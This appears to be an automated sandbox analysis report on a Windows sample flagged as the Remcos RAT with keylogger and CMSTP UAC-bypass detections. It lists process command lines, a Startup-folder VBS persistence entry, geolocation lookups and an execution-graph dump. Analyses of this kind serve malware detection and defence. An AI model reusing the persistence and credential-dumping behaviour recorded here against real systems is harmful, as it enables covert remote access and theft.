                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                        Sep 3, 2024 15:24:09.006366968 CEST1170INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 13:24:08 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:09:24:03
                        Start date:03/09/2024
                        Path:C:\Users\user\Desktop\Rgh99876k7e.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Rgh99876k7e.exe"
                        Imagebase:0x700000
                        File size:1'521'152 bytes
                        MD5 hash:BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:2
                        Start time:09:24:04
                        Start date:03/09/2024
                        Path:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Rgh99876k7e.exe"
                        Imagebase:0x890000
                        File size:1'521'152 bytes
                        MD5 hash:BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4551244504.0000000003DFF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2168391666.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4550751358.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4550520256.0000000001148000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2169326996.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2141891064.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 63%, ReversingLabs
                        Reputation:low
                        Has exited:false

                        General

                        Target ID:3
                        Start time:09:24:08
                        Start date:03/09/2024
                        Path:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\hrwdimdtylblmzmsnycdtxncbowjm"
                        Imagebase:0x890000
                        File size:1'521'152 bytes
                        MD5 hash:BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:4
                        Start time:09:24:08
                        Start date:03/09/2024
                        Path:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\sljoieovmttyofawejoeebhlbcosfxea"
                        Imagebase:0x890000
                        File size:1'521'152 bytes
                        MD5 hash:BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:5
                        Start time:09:24:08
                        Start date:03/09/2024
                        Path:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\cnoh"
                        Imagebase:0x890000
                        File size:1'521'152 bytes
                        MD5 hash:BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:6
                        Start time:09:24:15
                        Start date:03/09/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs"
                        Imagebase:0x7ff7bff00000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:09:24:16
                        Start date:03/09/2024
                        Path:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Cocles\antholite.exe"
                        Imagebase:0x890000
                        File size:1'521'152 bytes
                        MD5 hash:BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2233512989.0000000001904000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:2.9%
                          Dynamic/Decrypted Code Coverage:0.4%
                          Signature Coverage:3.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:42
                          execution_graph 95827 70df10 95830 70b710 95827->95830 95831 70b72b 95830->95831 95832 750146 95831->95832 95833 7500f8 95831->95833 95854 70b750 95831->95854 95896 7858a2 256 API calls 2 library calls 95832->95896 95836 750102 95833->95836 95839 75010f 95833->95839 95833->95854 95894 785d33 256 API calls 95836->95894 95852 70ba20 95839->95852 95895 7861d0 256 API calls 2 library calls 95839->95895 95842 71d336 40 API calls 95842->95854 95843 7503d9 95843->95843 95845 70bbe0 40 API calls 95845->95854 95848 70ba4e 95849 750322 95903 785c0c 82 API calls 95849->95903 95852->95848 95904 77359c 82 API calls __wsopen_s 95852->95904 95854->95842 95854->95845 95854->95848 95854->95849 95854->95852 95861 70ec40 95854->95861 95885 70a81b 41 API calls 95854->95885 95886 71d2f0 40 API calls 95854->95886 95887 71a01b 256 API calls 95854->95887 95888 720242 5 API calls __Init_thread_wait 95854->95888 95889 71edcd 22 API calls 95854->95889 95890 7200a3 29 API calls __onexit 95854->95890 95891 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95854->95891 95892 71ee53 82 API calls 95854->95892 95893 71e5ca 256 API calls 95854->95893 95897 70aceb 23 API calls messages 95854->95897 95898 75f6bf 23 API calls 95854->95898 95899 70a8c7 95854->95899 95863 70ec76 messages 95861->95863 95862 7200a3 29 API calls pre_c_initialization 95862->95863 95863->95862 95864 71fddb 22 API calls 95863->95864 95865 754beb 95863->95865 95868 70f3ae messages 95863->95868 95869 70fef7 95863->95869 95870 754600 95863->95870 95871 754b0b 95863->95871 95872 70a8c7 22 API calls 95863->95872 95878 720242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95863->95878 95879 70fbe3 95863->95879 95880 70a961 22 API calls 95863->95880 95881 70ed9d messages 95863->95881 95884 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95863->95884 95905 7101e0 256 API calls 2 library calls 95863->95905 95906 7106a0 41 API calls messages 95863->95906 95864->95863 95910 77359c 82 API calls __wsopen_s 95865->95910 95868->95881 95907 77359c 82 API calls __wsopen_s 95868->95907 95874 70a8c7 22 API calls 95869->95874 95869->95881 95876 70a8c7 22 API calls 95870->95876 95870->95881 95908 77359c 82 API calls __wsopen_s 95871->95908 95872->95863 95874->95881 95876->95881 95878->95863 95879->95868 95879->95881 95882 754bdc 95879->95882 95880->95863 95881->95854 95909 77359c 82 API calls __wsopen_s 95882->95909 95884->95863 95885->95854 95886->95854 95887->95854 95888->95854 95889->95854 95890->95854 95891->95854 95892->95854 95893->95854 95894->95839 95895->95852 95896->95854 95897->95854 95898->95854 95900 70a8ea __fread_nolock 95899->95900 95901 70a8db 95899->95901 95900->95854 95901->95900 95911 71fe0b 95901->95911 95903->95852 95904->95843 95905->95863 95906->95863 95907->95881 95908->95881 95909->95865 95910->95881 95913 71fddb 95911->95913 95914 71fdfa 95913->95914 95917 71fdfc 95913->95917 95921 72ea0c 95913->95921 95928 724ead 7 API calls 2 library calls 95913->95928 95914->95900 95916 72066d 95930 7232a4 RaiseException 95916->95930 95917->95916 95929 7232a4 RaiseException 95917->95929 95920 72068a 95920->95900 95927 733820 pre_c_initialization 95921->95927 95922 73385e 95932 72f2d9 20 API calls __dosmaperr 95922->95932 95924 733849 RtlAllocateHeap 95925 73385c 95924->95925 95924->95927 95925->95913 95927->95922 95927->95924 95931 724ead 7 API calls 2 library calls 95927->95931 95928->95913 95929->95916 95930->95920 95931->95927 95932->95925 95933 701033 95938 704c91 95933->95938 95937 701042 95946 70a961 95938->95946 95942 704d9c 95944 701038 95942->95944 95954 7051f7 22 API calls __fread_nolock 95942->95954 95945 7200a3 29 API calls __onexit 95944->95945 95945->95937 95947 71fe0b 22 API calls 95946->95947 95948 70a976 95947->95948 95955 71fddb 95948->95955 95950 704cff 95951 703af0 95950->95951 95968 703b1c 95951->95968 95954->95942 95957 71fde0 95955->95957 95956 72ea0c ___std_exception_copy 21 API calls 95956->95957 95957->95956 95958 71fdfa 95957->95958 95961 71fdfc 95957->95961 95965 724ead 7 API calls 2 library calls 95957->95965 95958->95950 95960 72066d 95967 7232a4 RaiseException 95960->95967 95961->95960 95966 7232a4 RaiseException 95961->95966 95964 72068a 95964->95950 95965->95957 95966->95960 95967->95964 95969 703b0f 95968->95969 95970 703b29 95968->95970 95969->95942 95970->95969 95971 703b30 RegOpenKeyExW 95970->95971 95971->95969 95972 703b4a RegQueryValueExW 95971->95972 95973 703b80 RegCloseKey 95972->95973 95974 703b6b 95972->95974 95973->95969 95974->95973 95975 703156 95978 703170 95975->95978 95979 703187 95978->95979 95980 7031eb 95979->95980 95981 70318c 95979->95981 96017 7031e9 95979->96017 95982 7031f1 95980->95982 95983 742dfb 95980->95983 95984 703265 PostQuitMessage 95981->95984 95985 703199 95981->95985 95987 7031f8 95982->95987 95988 70321d SetTimer RegisterWindowMessageW 95982->95988 96027 7018e2 10 API calls 95983->96027 96019 70316a 95984->96019 95990 7031a4 95985->95990 95991 742e7c 95985->95991 95986 7031d0 DefWindowProcW 95986->96019 95992 703201 KillTimer 95987->95992 95993 742d9c 95987->95993 95995 703246 CreatePopupMenu 95988->95995 95988->96019 95996 742e68 95990->95996 95997 7031ae 95990->95997 96042 76bf30 34 API calls ___scrt_fastfail 95991->96042 96023 7030f2 Shell_NotifyIconW ___scrt_fastfail 95992->96023 96004 742dd7 MoveWindow 95993->96004 96005 742da1 95993->96005 95994 742e1c 96028 71e499 42 API calls 95994->96028 95995->96019 96041 76c161 27 API calls ___scrt_fastfail 95996->96041 96002 742e4d 95997->96002 96003 7031b9 95997->96003 96002->95986 96040 760ad7 22 API calls 96002->96040 96007 703253 96003->96007 96008 7031c4 96003->96008 96004->96019 96010 742dc6 SetFocus 96005->96010 96011 742da7 96005->96011 96006 703214 96024 703c50 DeleteObject DestroyWindow 96006->96024 96025 70326f 44 API calls ___scrt_fastfail 96007->96025 96008->95986 96029 7030f2 Shell_NotifyIconW ___scrt_fastfail 96008->96029 96009 742e8e 96009->95986 96009->96019 96010->96019 96011->96008 96012 742db0 96011->96012 96026 7018e2 10 API calls 96012->96026 96017->95986 96018 703263 96018->96019 96021 742e41 96030 703837 96021->96030 96023->96006 96024->96019 96025->96018 96026->96019 96027->95994 96028->96008 96029->96021 96031 703862 ___scrt_fastfail 96030->96031 96043 704212 96031->96043 96035 7038e8 96036 743386 Shell_NotifyIconW 96035->96036 96037 703906 Shell_NotifyIconW 96035->96037 96047 703923 96037->96047 96039 70391c 96039->96017 96040->96017 96041->96018 96042->96009 96044 7435a4 96043->96044 96045 7038b7 96043->96045 96044->96045 96046 7435ad DestroyIcon 96044->96046 96045->96035 96069 76c874 42 API calls _strftime 96045->96069 96046->96045 96048 703a13 96047->96048 96049 70393f 96047->96049 96048->96039 96070 706270 96049->96070 96052 743393 LoadStringW 96055 7433ad 96052->96055 96053 70395a 96075 706b57 96053->96075 96059 70a8c7 22 API calls 96055->96059 96063 703994 ___scrt_fastfail 96055->96063 96056 70396f 96057 70397c 96056->96057 96058 7433c9 96056->96058 96057->96055 96060 703986 96057->96060 96061 706350 22 API calls 96058->96061 96059->96063 96087 706350 96060->96087 96064 7433d7 96061->96064 96066 7039f9 Shell_NotifyIconW 96063->96066 96064->96063 96096 7033c6 96064->96096 96066->96048 96067 7433f9 96068 7033c6 22 API calls 96067->96068 96068->96063 96069->96035 96071 71fe0b 22 API calls 96070->96071 96072 706295 96071->96072 96073 71fddb 22 API calls 96072->96073 96074 70394d 96073->96074 96074->96052 96074->96053 96076 744ba1 96075->96076 96077 706b67 _wcslen 96075->96077 96106 7093b2 96076->96106 96080 706ba2 96077->96080 96081 706b7d 96077->96081 96079 744baa 96079->96079 96083 71fddb 22 API calls 96080->96083 96105 706f34 22 API calls 96081->96105 96085 706bae 96083->96085 96084 706b85 __fread_nolock 96084->96056 96086 71fe0b 22 API calls 96085->96086 96086->96084 96088 706362 96087->96088 96089 744a51 96087->96089 96116 706373 96088->96116 96126 704a88 22 API calls __fread_nolock 96089->96126 96092 744a5b 96094 744a67 96092->96094 96095 70a8c7 22 API calls 96092->96095 96093 70636e 96093->96063 96095->96094 96097 7033dd 96096->96097 96098 7430bb 96096->96098 96132 7033ee 96097->96132 96100 71fddb 22 API calls 96098->96100 96102 7430c5 _wcslen 96100->96102 96101 7033e8 96101->96067 96103 71fe0b 22 API calls 96102->96103 96104 7430fe __fread_nolock 96103->96104 96105->96084 96107 7093c0 96106->96107 96108 7093c9 __fread_nolock 96106->96108 96107->96108 96110 70aec9 96107->96110 96108->96079 96108->96108 96111 70aedc 96110->96111 96115 70aed9 __fread_nolock 96110->96115 96112 71fddb 22 API calls 96111->96112 96113 70aee7 96112->96113 96114 71fe0b 22 API calls 96113->96114 96114->96115 96115->96108 96117 706382 96116->96117 96122 7063b6 __fread_nolock 96116->96122 96118 744a82 96117->96118 96119 7063a9 96117->96119 96117->96122 96121 71fddb 22 API calls 96118->96121 96127 70a587 96119->96127 96123 744a91 96121->96123 96122->96093 96124 71fe0b 22 API calls 96123->96124 96125 744ac5 __fread_nolock 96124->96125 96126->96092 96128 70a59d 96127->96128 96131 70a598 __fread_nolock 96127->96131 96129 74f80f 96128->96129 96130 71fe0b 22 API calls 96128->96130 96130->96131 96131->96122 96133 7033fe _wcslen 96132->96133 96134 703411 96133->96134 96135 74311d 96133->96135 96136 70a587 22 API calls 96134->96136 96137 71fddb 22 API calls 96135->96137 96138 70341e __fread_nolock 96136->96138 96139 743127 96137->96139 96138->96101 96140 71fe0b 22 API calls 96139->96140 96141 743157 __fread_nolock 96140->96141 96142 702e37 96143 70a961 22 API calls 96142->96143 96144 702e4d 96143->96144 96221 704ae3 96144->96221 96146 702e6b 96235 703a5a 96146->96235 96148 702e7f 96242 709cb3 96148->96242 96153 742cb0 96286 772cf9 96153->96286 96154 702ead 96157 70a8c7 22 API calls 96154->96157 96156 742cc3 96158 742ccf 96156->96158 96312 704f39 96156->96312 96159 702ec3 96157->96159 96162 704f39 68 API calls 96158->96162 96270 706f88 22 API calls 96159->96270 96166 742ce5 96162->96166 96163 702ecf 96164 709cb3 22 API calls 96163->96164 96165 702edc 96164->96165 96271 70a81b 41 API calls 96165->96271 96318 703084 22 API calls 96166->96318 96169 702eec 96171 709cb3 22 API calls 96169->96171 96170 742d02 96319 703084 22 API calls 96170->96319 96172 702f12 96171->96172 96272 70a81b 41 API calls 96172->96272 96175 742d1e 96176 703a5a 24 API calls 96175->96176 96177 742d44 96176->96177 96320 703084 22 API calls 96177->96320 96178 702f21 96181 70a961 22 API calls 96178->96181 96180 742d50 96182 70a8c7 22 API calls 96180->96182 96183 702f3f 96181->96183 96184 742d5e 96182->96184 96273 703084 22 API calls 96183->96273 96321 703084 22 API calls 96184->96321 96187 702f4b 96274 724a28 40 API calls 3 library calls 96187->96274 96188 742d6d 96192 70a8c7 22 API calls 96188->96192 96190 702f59 96190->96166 96191 702f63 96190->96191 96275 724a28 40 API calls 3 library calls 96191->96275 96194 742d83 96192->96194 96322 703084 22 API calls 96194->96322 96195 702f6e 96195->96170 96196 702f78 96195->96196 96276 724a28 40 API calls 3 library calls 96196->96276 96199 742d90 96200 702f83 96200->96175 96201 702f8d 96200->96201 96277 724a28 40 API calls 3 library calls 96201->96277 96203 702f98 96204 702fdc 96203->96204 96278 703084 22 API calls 96203->96278 96204->96188 96205 702fe8 96204->96205 96205->96199 96280 7063eb 22 API calls 96205->96280 96208 702fbf 96210 70a8c7 22 API calls 96208->96210 96209 702ff8 96281 706a50 22 API calls 96209->96281 96212 702fcd 96210->96212 96279 703084 22 API calls 96212->96279 96213 703006 96282 7070b0 23 API calls 96213->96282 96218 703021 96219 703065 96218->96219 96283 706f88 22 API calls 96218->96283 96284 7070b0 23 API calls 96218->96284 96285 703084 22 API calls 96218->96285 96222 704af0 __wsopen_s 96221->96222 96223 706b57 22 API calls 96222->96223 96224 704b22 96222->96224 96223->96224 96234 704b58 96224->96234 96323 704c6d 96224->96323 96226 709cb3 22 API calls 96227 704c52 96226->96227 96229 70515f 22 API calls 96227->96229 96228 709cb3 22 API calls 96228->96234 96232 704c5e 96229->96232 96230 704c6d 22 API calls 96230->96234 96232->96146 96233 704c29 96233->96226 96233->96232 96234->96228 96234->96230 96234->96233 96326 70515f 96234->96326 96332 741f50 96235->96332 96238 709cb3 22 API calls 96239 703a8d 96238->96239 96334 703aa2 96239->96334 96241 703a97 96241->96148 96243 709cc2 _wcslen 96242->96243 96244 71fe0b 22 API calls 96243->96244 96245 709cea __fread_nolock 96244->96245 96246 71fddb 22 API calls 96245->96246 96247 702e8c 96246->96247 96248 704ecb 96247->96248 96354 704e90 LoadLibraryA 96248->96354 96253 704ef6 LoadLibraryExW 96362 704e59 LoadLibraryA 96253->96362 96254 743ccf 96255 704f39 68 API calls 96254->96255 96257 743cd6 96255->96257 96259 704e59 3 API calls 96257->96259 96261 743cde 96259->96261 96384 7050f5 96261->96384 96262 704f20 96262->96261 96263 704f2c 96262->96263 96264 704f39 68 API calls 96263->96264 96266 702ea5 96264->96266 96266->96153 96266->96154 96269 743d05 96270->96163 96271->96169 96272->96178 96273->96187 96274->96190 96275->96195 96276->96200 96277->96203 96278->96208 96279->96204 96280->96209 96281->96213 96282->96218 96283->96218 96284->96218 96285->96218 96287 772d15 96286->96287 96288 70511f 64 API calls 96287->96288 96289 772d29 96288->96289 96636 772e66 75 API calls 96289->96636 96291 772d3b 96292 7050f5 40 API calls 96291->96292 96311 772d3f 96291->96311 96293 772d56 96292->96293 96294 7050f5 40 API calls 96293->96294 96295 772d66 96294->96295 96296 7050f5 40 API calls 96295->96296 96297 772d81 96296->96297 96298 7050f5 40 API calls 96297->96298 96299 772d9c 96298->96299 96300 70511f 64 API calls 96299->96300 96301 772db3 96300->96301 96302 72ea0c ___std_exception_copy 21 API calls 96301->96302 96303 772dba 96302->96303 96304 72ea0c ___std_exception_copy 21 API calls 96303->96304 96305 772dc4 96304->96305 96306 7050f5 40 API calls 96305->96306 96307 772dd8 96306->96307 96637 7728fe 27 API calls 96307->96637 96309 772dee 96309->96311 96638 7722ce 96309->96638 96311->96156 96313 704f43 96312->96313 96315 704f4a 96312->96315 96314 72e678 67 API calls 96313->96314 96314->96315 96316 704f59 96315->96316 96317 704f6a FreeLibrary 96315->96317 96316->96158 96317->96316 96318->96170 96319->96175 96320->96180 96321->96188 96322->96199 96324 70aec9 22 API calls 96323->96324 96325 704c78 96324->96325 96325->96224 96327 70516e 96326->96327 96331 70518f __fread_nolock 96326->96331 96329 71fe0b 22 API calls 96327->96329 96328 71fddb 22 API calls 96330 7051a2 96328->96330 96329->96331 96330->96234 96331->96328 96333 703a67 GetModuleFileNameW 96332->96333 96333->96238 96335 741f50 __wsopen_s 96334->96335 96336 703aaf GetFullPathNameW 96335->96336 96337 703ae9 96336->96337 96338 703ace 96336->96338 96348 70a6c3 96337->96348 96339 706b57 22 API calls 96338->96339 96341 703ada 96339->96341 96344 7037a0 96341->96344 96345 7037ae 96344->96345 96346 7093b2 22 API calls 96345->96346 96347 7037c2 96346->96347 96347->96241 96349 70a6d0 96348->96349 96350 70a6dd 96348->96350 96349->96341 96351 71fddb 22 API calls 96350->96351 96352 70a6e7 96351->96352 96353 71fe0b 22 API calls 96352->96353 96353->96349 96355 704ec6 96354->96355 96356 704ea8 